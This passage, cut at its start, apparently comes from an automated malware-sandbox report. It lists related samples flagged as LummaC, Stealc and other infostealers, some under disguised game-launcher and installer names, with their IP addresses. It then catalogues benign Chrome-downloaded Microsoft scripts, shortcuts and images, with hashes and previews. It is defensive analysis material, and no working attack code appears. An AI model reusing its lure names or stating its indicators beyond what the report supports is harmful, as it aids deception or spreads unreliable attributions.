                                                                                                                                                                          • 2.23.161.164
                                                                                                                                                                          21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                          • 52.149.20.212
                                                                                                                                                                          • 13.107.246.63
                                                                                                                                                                          • 2.23.161.164
                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          • 172.67.162.84
                                                                                                                                                                          No context
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 17:01:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                          Entropy (8bit):3.9808090527997604
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8AdeWT+yRpCH9idAKZdA19ehwiZUklqehekJy+3:88Pg/Yy
                                                                                                                                                                          MD5:36B21A92CB47EA2D9323C4B69AB7F16D
                                                                                                                                                                          SHA1:97C112929389B417117CBCB79979453A7BF444F2
                                                                                                                                                                          SHA-256:E052409946E205504DE8E4D65FC502C3237BCC3AD63A8BAAB09990F646B937EC
                                                                                                                                                                          SHA-512:7C2A66B2DAC6F069932608FA0BF371A2CBDC8266C0BAC53EDDB2F80BE8B1860F5E8FE0180B5A6D8826B60797D0AF991B6204EA60F7724D9AA54E705B003F6364
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.........=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY9............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 17:01:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                          Entropy (8bit):3.9962214401816247
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8ldeWT+yRpCH9idAKZdA1weh/iZUkAQkqehvkJy+2:8rPa9Q0Yy
                                                                                                                                                                          MD5:0996288EA9496ABDC627C695AFFF1D78
                                                                                                                                                                          SHA1:C7BF15BE06F400B87DCBE7224186EF834F95BC64
                                                                                                                                                                          SHA-256:36C35C84D7217407CDDB91953890E0B3DDC3C98A17AF17AAB2D125F64F529862
                                                                                                                                                                          SHA-512:D8245E6D0D8721522E808483ECAFB8C75871C5415D87DD69D3D392BFA241C75C38BC3810B05231A66C03C0CC5D9F03A0E3B6B8B4A34006CE4F5FDDBCA32B1B13
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....qN...=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY9............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                          Entropy (8bit):4.006820767591351
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8xYdeWT+yRpsH9idAKZdA14tseh7sFiZUkmgqeh7s9kJy+BX:8xEPInjYy
                                                                                                                                                                          MD5:A909C8B17C3D8612449DA67DB0695D27
                                                                                                                                                                          SHA1:8F8A481285539796B13EBB1C51BD6AAA3A96FF28
                                                                                                                                                                          SHA-256:775789D4AA637FCC667C32363836EAC5A221C646959FCC12634ECF743A0EBE78
                                                                                                                                                                          SHA-512:D067DC0B2D3BE51A4F7A81C9E5C7CBFC105861827F624AE0F8E3BD96AE9EFE75F7D610DCBC09F5B5DD852F15E98E9B96A04FE56E91F830969B72DFC13024299C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 17:01:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                          Entropy (8bit):3.997851589721961
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8edeWT+yRpCH9idAKZdA1vehDiZUkwqehLkJy+R:8OPBlYy
                                                                                                                                                                          MD5:69E57919E50BEB7FF1CEAAB9576D558B
                                                                                                                                                                          SHA1:C952DD5AD28847631A538150CE2B01B054E53AB5
                                                                                                                                                                          SHA-256:F210FD78EBE90CC80A35F4EBF92F567635C040DB49D88E264DC6FAF8EF6EA419
                                                                                                                                                                          SHA-512:B15DC335915B888C44ACB997583BD550F418B35F01625E25C0A3F900EAF11F229688A88944C78E99B582134E1A4AD44DA02CCB7049D5C0AA1E0DC21B3CFCEE84
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....!...=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY9............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 17:01:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                          Entropy (8bit):3.9852110951563926
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8/deWT+yRpCH9idAKZdA1hehBiZUk1W1qehRkJy+C:85PB9xYy
                                                                                                                                                                          MD5:E076F1580E331521DD666EC1136BB993
                                                                                                                                                                          SHA1:3202434C3C7482E760246728676C40B72C5E44EE
                                                                                                                                                                          SHA-256:E7823ADBDC633C8BFECEA1FA86D69D04E67DACFA5D3B674B4885A381C7EB61AA
                                                                                                                                                                          SHA-512:BFDCEFF0668B450160E690E1A67E14D19441C0AE7E74477B4657FD8A2CE218484177913C37104171CBA92C17948E0AEB864E360ACE3D5377072ACB149521E4ED
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,........=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY9............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 17:01:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                          Entropy (8bit):3.991351334157635
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8YYdeWT+yRpCH9idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbjkJy+yT+:8xP9T/TbxWOvTbjYy7T
                                                                                                                                                                          MD5:77A13D4D81D871D2264C10249D4470DC
                                                                                                                                                                          SHA1:8352555CA7E749BAED0F757ED6531B087214694D
                                                                                                                                                                          SHA-256:85B50F4481D29070E5ED7AF69492CD4F9D37A4D8F0A3C64A1E3FAC9424EC76DE
                                                                                                                                                                          SHA-512:A2F9FFC8C9DF6B9CC62CBD3DBA7DAE44524305FC82E88196D1C484EE01A57BC2AC4CE313025E4505E50B8689808534CF58451884F71C68C3241769AD1D4902E8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.........=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY8.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY9............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........}..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):52717
                                                                                                                                                                          Entropy (8bit):5.462668685745912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                          MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                          SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                          SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                          SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                          Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                          Encrypted:false
